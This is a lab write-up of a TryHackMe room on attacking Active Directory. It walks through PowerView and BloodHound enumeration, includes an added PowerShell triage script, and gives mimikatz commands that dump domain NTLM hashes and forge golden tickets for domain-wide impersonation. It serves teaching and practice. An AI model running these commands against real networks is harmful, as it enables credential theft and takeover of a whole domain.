#mimikatz #bloodhound #powerview #Goldentickets
Part 1: https://medium.com/@navkang/active-directory-enumeration-and-exploitation-for-beginners-604a32f45011
Part 2: https://medium.com/@navkang/attacking-kerberos-e2b1be3dbbe9
This is a follow-up write-up to Active Directory enumeration and exploitation for beginners (Part 1 above). Credit to TryHackMe for a fantastic learning room.
Contents
- Enumeration with PowerView
- Enumeration with BloodHound
- Dumping hashes with Mimikatz
- Golden Tickets with Mimikatz
1. Enumeration with PowerView
powershell -ep bypass
- this starts a new PowerShell process with the execution policy set to Bypass for that session only, so the downloaded PowerView.ps1 can be loaded. The execution policy is a safety feature against accidentally running scripts, not a security boundary: no elevated rights are needed to get past it.
Start PowerView (dot-sourcing the script loads its functions into the current session):
. .\Downloads\PowerView.ps1
Enumerate domain users:
Get-NetUser | select cn
Enumerate domain groups (here, any group whose name contains "admin"; * is a wildcard):
Get-NetGroup -GroupName *admin*
Find SMB shares on domain-joined computers:
Invoke-ShareFinder
For more commands: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
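The three commands above are usually the first of a longer checklist. The script below is an added example (not from the original post and not part of PowerView) that chains those commands with a few of their siblings from the same PowerView build (Get-NetDomain, Get-NetDomainController, Get-NetGroupMember, Get-NetComputer, and the -SPN switch of Get-NetUser), prints a one-line summary per step and saves each full result to a file, so nothing is lost if the shell dies. It assumes PowerView.ps1 has already been dot-sourced as shown above, and that the parameter names match the Get-Net* build of PowerView the post uses; the output folder name is an assumption. Check Get-Help <cmdlet> if your copy differs.

```powershell
# Added example: PowerView triage run. Assumes PowerView.ps1 is already dot-sourced
# in this session. Output folder is an assumption; change it to taste.
$OutDir = "$env:TEMP\ad-enum"
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

function Save-Enum {
    # Run one enumeration step, print a one-line summary and save the full output to a file.
    # Errors (for example a cmdlet that needs rights this account lacks) do not stop the run.
    param([string]$Name, [scriptblock]$Query)
    try {
        $result = & $Query
        $result | Format-List | Out-String -Width 200 | Set-Content "$OutDir\$Name.txt"
        Write-Host ("[+] {0}: {1} result(s) -> {2}\{3}.txt" -f $Name, @($result).Count, $OutDir, $Name)
    } catch {
        Write-Warning ("[-] {0} failed: {1}" -f $Name, $_.Exception.Message)
    }
}

# Where am I? Domain name and the domain controllers (the targets for sections 3 and 4).
Save-Enum 'domain' { Get-NetDomain }
Save-Enum 'dcs'    { Get-NetDomainController | Select-Object Name, IPAddress, OSVersion }

# Users: everyone (description fields often leak passwords), then the accounts with an SPN,
# which are the Kerberoasting targets covered in Part 2.
Save-Enum 'users'     { Get-NetUser | Select-Object cn, samaccountname, description }
Save-Enum 'users-spn' { Get-NetUser -SPN | Select-Object samaccountname, serviceprincipalname }

# Groups: anything admin-ish by name, and who actually sits in Domain Admins.
Save-Enum 'groups-admin'  { Get-NetGroup -GroupName '*admin*' }
Save-Enum 'domain-admins' { Get-NetGroupMember -GroupName 'Domain Admins' | Select-Object MemberName, IsGroup }

# Computers and shares: readable non-default shares are where scripts and config files with
# credentials turn up. -CheckShareAccess keeps only shares this account can open;
# -ExcludeStandard drops the default ADMIN$/C$/NETLOGON/SYSVOL-style shares.
Save-Enum 'computers' { Get-NetComputer }
Save-Enum 'shares'    { Invoke-ShareFinder -CheckShareAccess -ExcludeStandard }

Write-Host "[*] Done. Review the files in $OutDir, starting with users.txt and shares.txt."
```

Invoke-ShareFinder talks to every computer in the domain over SMB, so it is the loudest step here; on a real engagement run it last, or scope it with its -ComputerName parameter.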
2. Enumeration with BloodHound
- BloodHound itself only stores and analyses the data (in a Neo4j graph database); the data comes from a collector: SharpHound on a Windows host (the C# binary, or the SharpHound.ps1 wrapper used below) or BloodHound.py, which collects remotely from Linux with a set of domain credentials
powershell -ep bypass
. .\Downloads\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
- CollectionMethod All gathers group memberships, ACLs, trusts, logged-on sessions and local admin rights; the last two mean it connects to every computer in the domain, so it is noisy
Transfer the zip file to the Kali machine; as we are connected over SSH, scp can copy it back
Start Neo4j and BloodHound on your attacking system and log in with the Neo4j database credentials
Use "Upload Data" to load the zip, then open the pre-built queries (the "Analysis" tab), for example "Find all Domain Admins" and "Find Shortest Paths to Domain Admins"
3. Dump hashes with Mimikatz
Run mimikatz from an elevated (administrator) prompt on the domain controller:
.\mimikatz.exe
privilege::debug
- requests SeDebugPrivilege, which mimikatz needs to read and patch LSASS; this fails unless the shell is running as an administrator
lsadump::lsa /patch
- patches LSASS in memory and dumps the NTLM hash of every account held by the LSA; on a domain controller that is every domain account, on a workstation only the local SAM accounts
Crack the NTLM hashes with John the Ripper (--format=NT) or Hashcat (-m 1000), or skip cracking and use them directly with pass-the-hash (sekurlsa::pth in mimikatz)
4. Golden Tickets with Mimikatz
A golden ticket is a forged Kerberos TGT encrypted and signed with the krbtgt account's hash. The KDC trusts any TGT it can decrypt with that key, so the ticket lets you act as any user (even one that does not exist) on every machine in the domain, and it keeps working until the krbtgt password has been changed twice, because the KDC accepts both the current and the previous krbtgt key.
Dump the krbtgt hash (on the domain controller, from an elevated prompt):
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
- note both the NTLM hash and the domain SID printed on the "Domain :" line (S-1-5-21-..., with no trailing RID)
Create a Golden Ticket
kerberos::golden /user: /domain: /sid: /krbtgt: /id:
- /user is the account name to impersonate (Administrator is the usual choice), /domain the FQDN (CONTROLLER.local here), /sid the domain SID, /krbtgt the NTLM hash from the step above, /id the RID of the user (500 for the built-in Administrator). Without /ptt mimikatz writes the ticket to ticket.kirbi for later use (load it with kerberos::ptt ticket.kirbi); add /ptt to inject it straight into the current logon session. Mimikatz gives the ticket a 10-year lifetime by default, far beyond the usual 10-hour TGT lifetime, which is one of the things defenders look for.
Use the Golden Ticket to access other machines
misc::cmd
- this opens a new cmd.exe that inherits the logon session holding the injected ticket; from it you can reach any host in the domain, e.g. dir \\CONTROLLER.local\C$ (use host names rather than IP addresses so SMB authenticates with Kerberos instead of falling back to NTLM, where the forged ticket does not help)